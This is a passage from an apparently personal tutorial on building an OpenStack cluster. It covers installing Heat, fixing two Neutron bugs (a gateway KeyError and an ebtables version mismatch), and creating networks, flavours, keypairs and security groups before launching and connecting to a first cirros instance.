| object        | container  | etag                             |
+---------------+------------+----------------------------------+
| test_file.txt | container1 | ffc8c08a288fd4d5b11804fc331909b7 |
+---------------+------------+----------------------------------+
$ openstack object list container1
+---------------+
| Name          |
+---------------+
| test_file.txt |
+---------------+

We can download the file and view it with:

$ mkdir test
$ cd test
$ openstack object save container1 test_file.txt
$ cat test_file.txt
Test for Demo user

It worked! We can now delete the file with:

$ openstack object delete container1 test_file.txt

Installing Heat, the Orchestration Service

Heat is the orchestration service for OpenStack. Heat takes input in a form of templates which describe the deployment specifications for an application. You can specify what sort of virtual machines are required, their storage needs and network topologies, and Heat will go and make the infrastructure needed a reality.

Heat can manage the entire lifecycle of an application, from the initial deployment to changing requirements midway through, and to tearing down.

Heat directly interacts with the OpenStack API endpoints of the major services to manage infrastructure.

I will be following the Install Documentation.

Creating the Heat Database

Heat, like most OpenStack services need a database, so let’s make one on the Controller:

$ sudo mysql
MariaDB [(none)]> CREATE DATABASE heat;
Query OK, 1 row affected (0.012 sec)

Add the heat user and grant privileges:

MariaDB [(none)]> GRANT ALL PRIVILEGES ON heat.* TO 'heat'@'localhost' \
  IDENTIFIED BY 'password123';
Query OK, 1 row affected (0.012 sec)
MariaDB [(none)]> GRANT ALL PRIVILEGES ON heat.* TO 'heat'@'%' \
  IDENTIFIED BY 'password123';
Query OK, 1 row affected (0.012 sec)

Creating the Heat User and Services

Lets make a user for Heat:

$ . admin-openrc
$ openstack user create --domain default --password-prompt heat
User Password:
Repeat User Password:
+---------------------+----------------------------------+
| Field               | Value                            |
+---------------------+----------------------------------+
| domain_id           | default                          |
| enabled             | True                             |
| id                  | 3c8ca893913742619ed257ad0553b489 |
| name                | heat                             |
| options             | {}                               |
| password_expires_at | None                             |
+---------------------+----------------------------------+
$ openstack role add --project service --user heat admin

Heat needs two services to be created: heat and heat-cfn.

$ openstack service create --name heat --description "Orchestration" orchestration
+-------------+----------------------------------+
| Field       | Value                            |
+-------------+----------------------------------+
| description | Orchestration                    |
| enabled     | True                             |
| id          | 41cc3e7d6b634e80b31f1a88c4472aab |
| name        | heat                             |
| type        | orchestration                    |
+-------------+----------------------------------+
$ openstack service create --name heat-cfn --description "Orchestration"  cloudformation
+-------------+----------------------------------+
| Field       | Value                            |
+-------------+----------------------------------+
| description | Orchestration                    |
| enabled     | True                             |
| id          | d2fad2c90d9d4f16afeb26d5c7c29bbc |
| name        | heat-cfn                         |
| type        | cloudformation                   |
+-------------+----------------------------------+

Since we created two services, we now need to define two sets of endpoints. The first for heat:

$ openstack endpoint create --region RegionOne orchestration public http://controller:8004/v1/%\(tenant_id\)s
+--------------+-----------------------------------------+
| Field        | Value                                   |
+--------------+-----------------------------------------+
| enabled      | True                                    |
| id           | e33e7674797a497dbc1e5d425add3992        |
| interface    | public                                  |
| region       | RegionOne                               |
| region_id    | RegionOne                               |
| service_id   | 41cc3e7d6b634e80b31f1a88c4472aab        |
| service_name | heat                                    |
| service_type | orchestration                           |
| url          | http://controller:8004/v1/%(tenant_id)s |
+--------------+-----------------------------------------+
$ openstack endpoint create --region RegionOne orchestration internal http://controller:8004/v1/%\(tenant_id\)s
+--------------+-----------------------------------------+
| Field        | Value                                   |
+--------------+-----------------------------------------+
| enabled      | True                                    |
| id           | 67df0a3ade9d4322865daa20b87ac082        |
| interface    | internal                                |
| region       | RegionOne                               |
| region_id    | RegionOne                               |
| service_id   | 41cc3e7d6b634e80b31f1a88c4472aab        |
| service_name | heat                                    |
| service_type | orchestration                           |
| url          | http://controller:8004/v1/%(tenant_id)s |
+--------------+-----------------------------------------+
$ openstack endpoint create --region RegionOne orchestration admin http://controller:8004/v1/%\(tenant_id\)s
+--------------+-----------------------------------------+
| Field        | Value                                   |
+--------------+-----------------------------------------+
| enabled      | True                                    |
| id           | 7f16502e18994f45a39fb40443636c8c        |
| interface    | admin                                   |
| region       | RegionOne                               |
| region_id    | RegionOne                               |
| service_id   | 41cc3e7d6b634e80b31f1a88c4472aab        |
| service_name | heat                                    |
| service_type | orchestration                           |
| url          | http://controller:8004/v1/%(tenant_id)s |
+--------------+-----------------------------------------+

The second for heat-cfn:

$ openstack endpoint create --region RegionOne cloudformation public http://controller:8000/v1
+--------------+----------------------------------+
| Field        | Value                            |
+--------------+----------------------------------+
| enabled      | True                             |
| id           | a9944905d2474773a6f2604619ab86e3 |
| interface    | public                           |
| region       | RegionOne                        |
| region_id    | RegionOne                        |
| service_id   | d2fad2c90d9d4f16afeb26d5c7c29bbc |
| service_name | heat-cfn                         |
| service_type | cloudformation                   |
| url          | http://controller:8000/v1        |
+--------------+----------------------------------+
$ openstack endpoint create --region RegionOne cloudformation internal http://controller:8000/v1
+--------------+----------------------------------+
| Field        | Value                            |
+--------------+----------------------------------+
| enabled      | True                             |
| id           | 587390973b9f4817a8ad2e27b04373b9 |
| interface    | internal                         |
| region       | RegionOne                        |
| region_id    | RegionOne                        |
| service_id   | d2fad2c90d9d4f16afeb26d5c7c29bbc |
| service_name | heat-cfn                         |
| service_type | cloudformation                   |
| url          | http://controller:8000/v1        |
+--------------+----------------------------------+
$ openstack endpoint create --region RegionOne cloudformation admin http://controller:8000/v1
+--------------+----------------------------------+
| Field        | Value                            |
+--------------+----------------------------------+
| enabled      | True                             |
| id           | a6494f8979e44921b85cd6595e136837 |
| interface    | admin                            |
| region       | RegionOne                        |
| region_id    | RegionOne                        |
| service_id   | d2fad2c90d9d4f16afeb26d5c7c29bbc |
| service_name | heat-cfn                         |
| service_type | cloudformation                   |
| url          | http://controller:8000/v1        |
+--------------+----------------------------------+

Heat requires another domain to be able to manage its infrastructure, so we need to create that, and an admin user and role for this new domain:

$ openstack domain create --description "Stack projects and users" heat
+-------------+----------------------------------+
| Field       | Value                            |
+-------------+----------------------------------+
| description | Stack projects and users         |
| enabled     | True                             |
| id          | 1337b657083e4946996d55cf49ce80e0 |
| name        | heat                             |
| options     | {}                               |
| tags        | []                               |
+-------------+----------------------------------+
$ openstack user create --domain heat --password-prompt heat_domain_admin
User Password:
Repeat User Password:
+---------------------+----------------------------------+
| Field               | Value                            |
+---------------------+----------------------------------+
| domain_id           | 1337b657083e4946996d55cf49ce80e0 |
| enabled             | True                             |
| id                  | 81277e90fa7341aea05224e59adbd6ea |
| name                | heat_domain_admin                |
| options             | {}                               |
| password_expires_at | None                             |
+---------------------+----------------------------------+
$ openstack role add --domain heat --user-domain heat --user heat_domain_admin admin
$ openstack role create heat_stack_owner
+-------------+----------------------------------+
| Field       | Value                            |
+-------------+----------------------------------+
| description | None                             |
| domain_id   | None                             |
| id          | 1625641497494370b0f98e6d1dcb0b2e |
| name        | heat_stack_owner                 |
| options     | {}                               |
+-------------+----------------------------------+
$ openstack role add --project demo --user demo heat_stack_owner
$ openstack role create heat_stack_user
+-------------+----------------------------------+
| Field       | Value                            |
+-------------+----------------------------------+
| description | None                             |
| domain_id   | None                             |
| id          | 8dfebc17aa4f45b5b5ed1e4be35ce98b |
| name        | heat_stack_user                  |
| options     | {}                               |
+-------------+----------------------------------+

Installing and Configuring Heat on the Controller

Once all the users, services and endpoints are set up, we can install the Heat packages and start configuration.

$ sudo apt install heat-api heat-api-cfn heat-engine

Lets configure:

$ sudo vim /etc/heat/heat.conf
[database]
connection = mysql+pymysql://heat:password123@controller/heat

[DEFAULT]
transport_url = rabbit://openstack:password123@controller
heat_metadata_server_url = http://controller:8000
heat_waitcondition_server_url = http://controller:8000/v1/waitcondition
stack_domain_admin = heat_domain_admin
stack_domain_admin_password = openstack
stack_user_domain_name = heat

Then, we just need to configure Keystone:

[keystone_authtoken]
www_authenticate_uri = http://controller:5000
auth_url = http://controller:5000
memcached_servers = controller:11211
auth_type = password
project_domain_name = default
user_domain_name = default
project_name = service
username = heat
password = openstack

[trustee]
auth_type = password
auth_url = http://controller:5000
username = heat
password = openstack
user_domain_name = default

[clients_keystone]
auth_uri = http://controller:5000

Save the file, then populate the database with:

$ sudo -s
# su -s /bin/sh -c "heat-manage db_sync" heat

Finally, restart the Heat services:

$ sudo systemctl restart heat-api
$ sudo systemctl restart heat-api-cfn
$ sudo systemctl restart heat-engine

We can verify everything is working as intended by listing the services:

$ openstack orchestration service list
+------------+-------------+--------------------------------------+------------+--------+----------------------------+--------+
| Hostname   | Binary      | Engine ID                            | Host       | Topic  | Updated At                 | Status |
+------------+-------------+--------------------------------------+------------+--------+----------------------------+--------+
| controller | heat-engine | 993cff41-f3cf-45d3-9f38-d09e04fff701 | controller | engine | 2020-02-06T03:09:12.000000 | up     |
| controller | heat-engine | 1640f217-da50-4565-b6e1-cdbc26a688a7 | controller | engine | 2020-02-06T03:09:12.000000 | up     |
| controller | heat-engine | 2051654e-bb5d-45c5-9d48-5e83cfea4e04 | controller | engine | 2020-02-06T03:09:12.000000 | up     |
| controller | heat-engine | d19f1626-5830-452f-a198-071950d88a1d | controller | engine | 2020-02-06T03:09:12.000000 | up     |
+------------+-------------+--------------------------------------+------------+--------+----------------------------+--------+

Bugs I Encountered and How to Fix Them

Right at the very end, after the next section, when I tried to launch an instance I ran into problems and my instances kept failing to launch. After a bit of debugging it turned out that I had experienced two separate bugs in Neutron.

Neutron on the Controller Node: KeyError: ‘gateway’

After reviewing /var/log/neutron/neutron-linuxbridge-agent.log on the controller node, I saw: (full error for those googling for help in the future =D ).

ERROR neutron.plugins.ml2.drivers.agent._common_agent [req-94658efb-0dd2-4c95-94ba-85b2ee8c49c2 - - - - -] Error in agent loop. Devices info: {'current': {'tapee2ba6c7-78'}, 'timesta
mps': {'tapee2ba6c7-78': 5}, 'added': {'tapee2ba6c7-78'}, 'removed': set(), 'updated': set()}: KeyError: 'gateway'
Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/agent/_common_agent.py", line 465, in daemon_loop
    sync = self.process_network_devices(device_info)
  File "/usr/lib/python3/dist-packages/osprofiler/profiler.py", line 160, in wrapper
    result = f(*args, **kwargs)
  File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/agent/_common_agent.py", line 214, in process_network_devices
    resync_a = self.treat_devices_added_updated(devices_added_updated)
  File "/usr/lib/python3/dist-packages/osprofiler/profiler.py", line 160, in wrapper
    result = f(*args, **kwargs)
  File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/agent/_common_agent.py", line 231, in treat_devices_added_updated
    self._process_device_if_exists(device_details)
  File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/agent/_common_agent.py", line 258, in _process_device_if_exists
    device, device_details['device_owner'])
  File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/linuxbridge/agent/linuxbridge_neutron_agent.py", line 586, in plug_interface
    network_segment.mtu)
  File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/linuxbridge/agent/linuxbridge_neutron_agent.py", line 522, in add_tap_interface
    return False
  File "/usr/lib/python3/dist-packages/oslo_utils/excutils.py", line 220, in __exit__
    self.force_reraise()
  File "/usr/lib/python3/dist-packages/oslo_utils/excutils.py", line 196, in force_reraise
    six.reraise(self.type_, self.value, self.tb)
  File "/usr/lib/python3/dist-packages/six.py", line 693, in reraise
    raise value
  File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/linuxbridge/agent/linuxbridge_neutron_agent.py", line 514, in add_tap_interface
    tap_device_name, device_owner, mtu)
  File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/linuxbridge/agent/linuxbridge_neutron_agent.py", line 547, in _add_tap_interface
    mtu):
  File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/linuxbridge/agent/linuxbridge_neutron_agent.py", line 498, in ensure_physical_in_bridge
    physical_interface)
  File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/linuxbridge/agent/linuxbridge_neutron_agent.py", line 287, in ensure_flat_bridge
    if self.ensure_bridge(bridge_name, physical_interface):
  File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/linuxbridge/agent/linuxbridge_neutron_agent.py", line 456, in ensure_bridge
    self.update_interface_ip_details(bridge_name, interface)
  File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/linuxbridge/agent/linuxbridge_neutron_agent.py", line 418, in update_interface_ip_details
    gateway)
  File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/linuxbridge/agent/linuxbridge_neutron_agent.py", line 402, in _update_interface_ip_details
    dst_device.route.add_gateway(gateway=gateway['gateway'],
KeyError: 'gateway'

One of my team members linked me to this Ask OpenStack page, since it lists the same problem. I tried using brctl addif to add the new bridges to the interfaces, but it did not solve the problem.

After a bit more googling, I tracked down Launchpad Bug #1855759.

This is the exact problem I was hitting. Nice to see it got fixed upstream and backported to upstream -stable for Neutron.

I manually modified the files under /usr/lib/python3/dist-packages/neutron/, and applied the changes from the following commit to them:

commit b99765df8f1d1d6d3ceee3d481d1e6ee1b2200e7
Author: Rodolfo Alonso Hernandez <ralonsoh@redhat.com>
Date: Tue Dec 10 15:50:20 2019 +0000
Subject: Use "via" in gateway dictionary in Linux Bridge agent

I used the Backported Commit to Train.

After that I restarted all Neutron services on the controller, and everything worked.

Yes, I will make sure to SRU this fix to Eoan to help everyone out - watch this space.

Neutron on the Compute Note: ebtables Unknown argument ‘–among-src’

After reviewing /var/log/neutron/neutron-linuxbridge-agent.log on the compute node, I saw: (full error for those googling for help in the future =D ).

ERROR neutron.plugins.ml2.drivers.agent._common_agent [req-91257a46-44ee-4246-b3b6-813d82f1c2d3 - - - - -] Error in agent loop. Devices info: {'current': {'tap5878f227-c9'}, 'timestamps': {'tap5878f227-c9': 13}, 'added': {'tap5878f227-c9'}, 'removed': set(), 'updated': set()}: neutron_lib.exceptions.ProcessExecutionError: Exit code: 2; Stdin: ; Stdout: ; Stderr: ebtables v1.8.3 (nf_tables): Unknown argument: '--among-src'
Try `ebtables -h' or 'ebtables --help' for more information.
Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/agent/_common_agent.py", line 465, in daemon_loop
    sync = self.process_network_devices(device_info)
  File "/usr/lib/python3/dist-packages/osprofiler/profiler.py", line 160, in wrapper
    result = f(*args, **kwargs)
  File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/agent/_common_agent.py", line 214, in process_network_devices
    resync_a = self.treat_devices_added_updated(devices_added_updated)
  File "/usr/lib/python3/dist-packages/osprofiler/profiler.py", line 160, in wrapper
    result = f(*args, **kwargs)
  File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/agent/_common_agent.py", line 231, in treat_devices_added_updated
    self._process_device_if_exists(device_details)
  File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/agent/_common_agent.py", line 246, in _process_device_if_exists
    device_details)
  File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/linuxbridge/agent/linuxbridge_neutron_agent.py", line 865, in setup_arp_spoofing_protection
    arp_protect.setup_arp_spoofing_protection(device, device_details)
  File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/linuxbridge/agent/arp_protect.py", line 42, in setup_arp_spoofing_protection
    _setup_arp_spoofing_protection(vif, port_details)
  File "/usr/lib/python3/dist-packages/oslo_concurrency/lockutils.py", line 328, in inner
    return f(*args, **kwargs)
  File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/linuxbridge/agent/arp_protect.py", line 48, in _setup_arp_spoofing_protection
    _install_mac_spoofing_protection(vif, port_details, current_rules)
  File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/linuxbridge/agent/arp_protect.py", line 184, in _install_mac_spoofing_protection
    ebtables(new_rule)
  File "/usr/lib/python3/dist-packages/tenacity/__init__.py", line 292, in wrapped_f
    return self.call(f, *args, **kw)
  File "/usr/lib/python3/dist-packages/tenacity/__init__.py", line 358, in call
    do = self.iter(retry_state=retry_state)
  File "/usr/lib/python3/dist-packages/tenacity/__init__.py", line 319, in iter
    return fut.result()
  File "/usr/lib/python3.7/concurrent/futures/_base.py", line 428, in result
    return self.__get_result()
  File "/usr/lib/python3.7/concurrent/futures/_base.py", line 384, in __get_result
    raise self._exception
  File "/usr/lib/python3/dist-packages/tenacity/__init__.py", line 361, in call
    result = fn(*args, **kwargs)
  File "/usr/lib/python3/dist-packages/neutron/plugins/ml2/drivers/linuxbridge/agent/arp_protect.py", line 232, in ebtables
    run_as_root=True)
  File "/usr/lib/python3/dist-packages/neutron/agent/linux/ip_lib.py", line 713, in execute
    run_as_root=run_as_root)
  File "/usr/lib/python3/dist-packages/neutron/agent/linux/utils.py", line 147, in execute
    returncode=returncode)
neutron_lib.exceptions.ProcessExecutionError: Exit code: 2; Stdin: ; Stdout: ; Stderr: ebtables v1.8.3 (nf_tables): Unknown argument: '--among-src'
Try `ebtables -h' or 'ebtables --help' for more information.

It seems ebtables comes in both the ebtables and iptables packages, and at different versions:

$ ebtabls --version

Command 'ebtabls' not found, did you mean:

  command 'ebtables' from deb ebtables (2.0.10.4+snapshot20181205-1ubuntu1)
  command 'ebtables' from deb iptables (1.8.3-2ubuntu5)

Try: sudo apt install <deb name>

It seems ebtables is managed by alternatives:

$ ll /usr/sbin/ebtables
16:12 lrwxrwxrwx 1 root root 26 Oct 17 13:09 /usr/sbin/ebtables -> /etc/alternatives/ebtables*

Lets change that:

$ /usr/sbin/ebtables --version
ebtables 1.8.3 (nf_tables)
$ sudo update-alternatives --config ebtables
There are 2 choices for the alternative ebtables (providing /usr/sbin/ebtables).

  Selection    Path                       Priority   Status
------------------------------------------------------------
* 0            /usr/sbin/ebtables-nft      10        auto mode
  1            /usr/sbin/ebtables-legacy   10        manual mode
  2            /usr/sbin/ebtables-nft      10        manual mode

Press <enter> to keep the current choice[*], or type selection number: 1
update-alternatives: using /usr/sbin/ebtables-legacy to provide /usr/sbin/ebtables (ebtables) in manual mode
$ ebtables --version
ebtables v2.0.10.4 (legacy) (December 2011)

Much better. Version 1.8.3 does not implement among and version 2.0.10.4 does. I highly recommend updating the alternatives for ebtables right now if you are following this blog post.

After this, restart the Neutron services on the compute node.

Final Configuration

If you have made it this far, then congratulations. You have a cluster which is nearly all set up and nearly ready to begin launching instances.

Before we can launch our first instance, we just need to set up some virtual networks, add a keypair used for SSH, create some security group rules so we aren’t firewalled out, and to create some instance flavours so we can launch virtual machines of differing specifications.

Configuring Virtual Networks

We need to tell OpenStack about our provider network on 203.0.113.0/24, and what ranges of IP addresses we want to assign:

$ . admin-openrc
$ openstack network create --share --provider-physical-network provider \
  --provider-network-type flat provider
+---------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+
| Field                     | Value                                                                                                                                                   |
+---------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+
| admin_state_up            | UP                                                                                                                                                      |
| availability_zone_hints   |                                                                                                                                                         |
| availability_zones        |                                                                                                                                                         |
| created_at                | 2020-02-12T04:05:26Z                                                                                                                                    |
| description               |                                                                                                                                                         |
| dns_domain                | None                                                                                                                                                    |
| id                        | 01ae2817-9697-430f-bdd4-6435d45dbbda                                                                                                                    |
| ipv4_address_scope        | None                                                                                                                                                    |
| ipv6_address_scope        | None                                                                                                                                                    |
| is_default                | None                                                                                                                                                    |
| is_vlan_transparent       | None                                                                                                                                                    |
| location                  | cloud='', project.domain_id=, project.domain_name='Default', project.id='a45f9c52c6964c5da7585f5c8a70fdc7', project.name='admin', region_name='', zone= |
| mtu                       | 1500                                                                                                                                                    |
| name                      | provider                                                                                                                                                |
| port_security_enabled     | True                                                                                                                                                    |
| project_id                | a45f9c52c6964c5da7585f5c8a70fdc7                                                                                                                        |
| provider:network_type     | flat                                                                                                                                                    |
| provider:physical_network | provider                                                                                                                                                |
| provider:segmentation_id  | None                                                                                                                                                    |
| qos_policy_id             | None                                                                                                                                                    |
| revision_number           | 1                                                                                                                                                       |
| router:external           | Internal                                                                                                                                                |
| segments                  | None                                                                                                                                                    |
| shared                    | True                                                                                                                                                    |
| status                    | ACTIVE                                                                                                                                                  |
| subnets                   |                                                                                                                                                         |
| tags                      |                                                                                                                                                         |
| updated_at                | 2020-02-12T04:05:26Z                                                                                                                                    |
+---------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+
$ openstack subnet create --network provider --allocation-pool start=203.0.113.101,end=203.0.113.250 --dns-nameserver 8.8.8.8 --gateway 203.0.113.1 --subnet-range 203.0.113.0/24 provider
+-------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+
| Field             | Value                                                                                                                                                   |
+-------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+
| allocation_pools  | 203.0.113.101-203.0.113.250                                                                                                                             |
| cidr              | 203.0.113.0/24                                                                                                                                          |
| created_at        | 2020-02-12T04:05:37Z                                                                                                                                    |
| description       |                                                                                                                                                         |
| dns_nameservers   | 8.8.8.8                                                                                                                                                 |
| enable_dhcp       | True                                                                                                                                                    |
| gateway_ip        | 203.0.113.1                                                                                                                                             |
| host_routes       |                                                                                                                                                         |
| id                | 6e854541-fc59-4639-947b-a074efc05463                                                                                                                    |
| ip_version        | 4                                                                                                                                                       |
| ipv6_address_mode | None                                                                                                                                                    |
| ipv6_ra_mode      | None                                                                                                                                                    |
| location          | cloud='', project.domain_id=, project.domain_name='Default', project.id='a45f9c52c6964c5da7585f5c8a70fdc7', project.name='admin', region_name='', zone= |
| name              | provider                                                                                                                                                |
| network_id        | 01ae2817-9697-430f-bdd4-6435d45dbbda                                                                                                                    |
| prefix_length     | None                                                                                                                                                    |
| project_id        | a45f9c52c6964c5da7585f5c8a70fdc7                                                                                                                        |
| revision_number   | 0                                                                                                                                                       |
| segment_id        | None                                                                                                                                                    |
| service_types     |                                                                                                                                                         |
| subnetpool_id     | None                                                                                                                                                    |
| tags              |                                                                                                                                                         |
| updated_at        | 2020-02-12T04:05:37Z                                                                                                                                    |
+-------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+

We can list networks with:

$ openstack network list
+--------------------------------------+----------+--------------------------------------+
| ID                                   | Name     | Subnets                              |
+--------------------------------------+----------+--------------------------------------+
| 01ae2817-9697-430f-bdd4-6435d45dbbda | provider | 6e854541-fc59-4639-947b-a074efc05463 |
+--------------------------------------+----------+--------------------------------------+

Creating Some Flavours

We need to tell OpenStack what sort of specifications we wish to assign to instances, which are called flavours.

We will add a few of them:

$ openstack flavor create --id 0 --vcpus 1 --ram 64 --disk 1 m1.nano\
+----------------------------+---------+
| Field                      | Value   |
+----------------------------+---------+
| OS-FLV-DISABLED:disabled   | False   |
| OS-FLV-EXT-DATA:ephemeral  | 0       |
| disk                       | 1       |
| id                         | 0       |
| name                       | m1.nano |
| os-flavor-access:is_public | True    |
| properties                 |         |
| ram                        | 64      |
| rxtx_factor                | 1.0     |
| swap                       |         |
| vcpus                      | 1       |
+----------------------------+---------+

$ openstack flavor create --id 1 --vcpus 1 --ram 128 --disk 2 m1.small
$ openstack flavor create --id 2 --vcpus 1 --ram 256 --disk 3 m1.large
$ openstack flavor create --id 3 --vcpus 2 --ram 512 --disk 5 m1.xlarge

We can list all flavors with:

$ openstack flavor list
+----+-----------+-----+------+-----------+-------+-----------+
| ID | Name      | RAM | Disk | Ephemeral | VCPUs | Is Public |
+----+-----------+-----+------+-----------+-------+-----------+
| 0  | m1.nano   |  64 |    1 |         0 |     1 | True      |
| 1  | m1.small  | 128 |    2 |         0 |     1 | True      |
| 2  | m1.large  | 256 |    3 |         0 |     1 | True      |
| 3  | m1.xlarge | 512 |    5 |         0 |     2 | True      |
+----+-----------+-----+------+-----------+-------+-----------+

Adding a SSH Keypair

We need to seed the instance with a SSH keypair that we can use to connect with.

Let’s make a new SSH keypair for the demo user and add it to the keypair store.

$ . demo-openrc
$ ssh-keygen -q -N ""
$ openstack keypair create --public-key ~/.ssh/id_rsa.pub mykey
+-------------+-------------------------------------------------+
| Field       | Value                                           |
+-------------+-------------------------------------------------+
| fingerprint | 72:d1:ee:80:59:f1:9a:03:96:d6:3f:31:32:53:20:9e |
| name        | mykey                                           |
| user_id     | bf0cfff44d3c49cb92d10e5977a9decc                |
+-------------+-------------------------------------------------+

We can check our list of keys with:

$ openstack keypair list
+-------+-------------------------------------------------+
| Name  | Fingerprint                                     |
+-------+-------------------------------------------------+
| mykey | 72:d1:ee:80:59:f1:9a:03:96:d6:3f:31:32:53:20:9e |
+-------+-------------------------------------------------+

Creating a Basic Security Group

We need to create a basic security group for our instances so we can connect to them. For now, we will allow SSH and ICMP through the firewall.

$ openstack security group rule create --proto icmp default
$ openstack security group rule create --proto icmp default
+-------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------+
| Field             | Value                                                                                                                                                  |
+-------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------+
| created_at        | 2020-02-06T03:52:15Z                                                                                                                                   |
| description       |                                                                                                                                                        |
| direction         | ingress                                                                                                                                                |
| ether_type        | IPv4                                                                                                                                                   |
| id                | 4ec97531-46d7-4c26-bb38-6d122f077168                                                                                                                   |
| location          | cloud='', project.domain_id=, project.domain_name='Default', project.id='33569bb56110474db2d584b4a1936c6b', project.name='demo', region_name='', zone= |
| name              | None                                                                                                                                                   |
| port_range_max    | None                                                                                                                                                   |
| port_range_min    | None                                                                                                                                                   |
| project_id        | 33569bb56110474db2d584b4a1936c6b                                                                                                                       |
| protocol          | icmp                                                                                                                                                   |
| remote_group_id   | None                                                                                                                                                   |
| remote_ip_prefix  | 0.0.0.0/0                                                                                                                                              |
| revision_number   | 0                                                                                                                                                      |
| security_group_id | ecea2521-11a6-4e2d-b979-6d5c59bd1580                                                                                                                   |
| tags              | []                                                                                                                                                     |
| updated_at        | 2020-02-06T03:52:15Z                                                                                                                                   |
+-------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------+
$ openstack security group rule create --proto tcp --dst-port 22 default
+-------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------+
| Field             | Value                                                                                                                                                  |
+-------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------+
| created_at        | 2020-02-06T03:52:46Z                                                                                                                                   |
| description       |                                                                                                                                                        |
| direction         | ingress                                                                                                                                                |
| ether_type        | IPv4                                                                                                                                                   |
| id                | 54332a65-d89e-49ac-9756-fd72ad2c18ee                                                                                                                   |
| location          | cloud='', project.domain_id=, project.domain_name='Default', project.id='33569bb56110474db2d584b4a1936c6b', project.name='demo', region_name='', zone= |
| name              | None                                                                                                                                                   |
| port_range_max    | 22                                                                                                                                                     |
| port_range_min    | 22                                                                                                                                                     |
| project_id        | 33569bb56110474db2d584b4a1936c6b                                                                                                                       |
| protocol          | tcp                                                                                                                                                    |
| remote_group_id   | None                                                                                                                                                   |
| remote_ip_prefix  | 0.0.0.0/0                                                                                                                                              |
| revision_number   | 0                                                                                                                                                      |
| security_group_id | ecea2521-11a6-4e2d-b979-6d5c59bd1580                                                                                                                   |
| tags              | []                                                                                                                                                     |
| updated_at        | 2020-02-06T03:52:46Z                                                                                                                                   |
+-------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------+

We can list security groups with:

$ openstack security group list
+--------------------------------------+---------+------------------------+----------------------------------+------+
| ID                                   | Name    | Description            | Project                          | Tags |
+--------------------------------------+---------+------------------------+----------------------------------+------+
| ecea2521-11a6-4e2d-b979-6d5c59bd1580 | default | Default security group | 33569bb56110474db2d584b4a1936c6b | []   |
+--------------------------------------+---------+------------------------+----------------------------------+------+

Launching an Instance

Everything should be set now. Go ahead and launch your first instance with the cirros image we previous uploaded into Glance.

$ openstack server create --flavor m1.nano --image cirros --nic net-id=01ae2817-9697-430f-bdd4-6435d45dbbda \
 --security-group default --key-name mykey myfirstinstance
+-----------------------------+-----------------------------------------------+
| Field                       | Value                                         |
+-----------------------------+-----------------------------------------------+
| OS-DCF:diskConfig           | MANUAL                                        |
| OS-EXT-AZ:availability_zone |                                               |
| OS-EXT-STS:power_state      | NOSTATE                                       |
| OS-EXT-STS:task_state       | scheduling                                    |
| OS-EXT-STS:vm_state         | building                                      |
| OS-SRV-USG:launched_at      | None                                          |
| OS-SRV-USG:terminated_at    | None                                          |
| accessIPv4                  |                                               |
| accessIPv6                  |                                               |
| addresses                   |                                               |
| adminPass                   | Q9XtMEM56LnW                                  |
| config_drive                |                                               |
| created                     | 2020-02-12T04:06:59Z                          |
| flavor                      | m1.nano (0)                                   |
| hostId                      |                                               |
| id                          | 8b16810d-1c9c-4094-b794-f2929388623c          |
| image                       | cirros (5ad293f2-1d07-44ae-8a23-19d619885a3b) |
| key_name                    | mykey                                         |
| name                        | myfirstinstance                               |
| progress                    | 0                                             |
| project_id                  | 33569bb56110474db2d584b4a1936c6b              |
| properties                  |                                               |
| security_groups             | name='ecea2521-11a6-4e2d-b979-6d5c59bd1580'   |
| status                      | BUILD                                         |
| updated                     | 2020-02-12T04:06:59Z                          |
| user_id                     | bf0cfff44d3c49cb92d10e5977a9decc              |
| volumes_attached            |                                               |
+-----------------------------+-----------------------------------------------+

That has begun the process to provision a new virtual machine on the compute node with the m1.nano flavor.

We can check the status of our instance with:

$ openstack server list
+--------------------------------------+-----------------+--------+------------------------+--------+---------+
| ID                                   | Name            | Status | Networks               | Image  | Flavor  |
+--------------------------------------+-----------------+--------+------------------------+--------+---------+
| 8b16810d-1c9c-4094-b794-f2929388623c | myfirstinstance | ACTIVE | provider=203.0.113.103 | cirros | m1.nano |
+--------------------------------------+-----------------+--------+------------------------+--------+---------+

We can also check the status from Horizon:

From there, we can go ahead and SSH into it, with the “cirros” user:

$ ssh cirros@203.0.113.103
The authenticity of host '203.0.113.103 (203.0.113.103)' can't be established.
ECDSA key fingerprint is SHA256:cs620jJtz28Xum30RluDJ4cLjQ7WzB89xhAxoWcODSk.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '203.0.113.103' (ECDSA) to the list of known hosts.
$ uname -rv
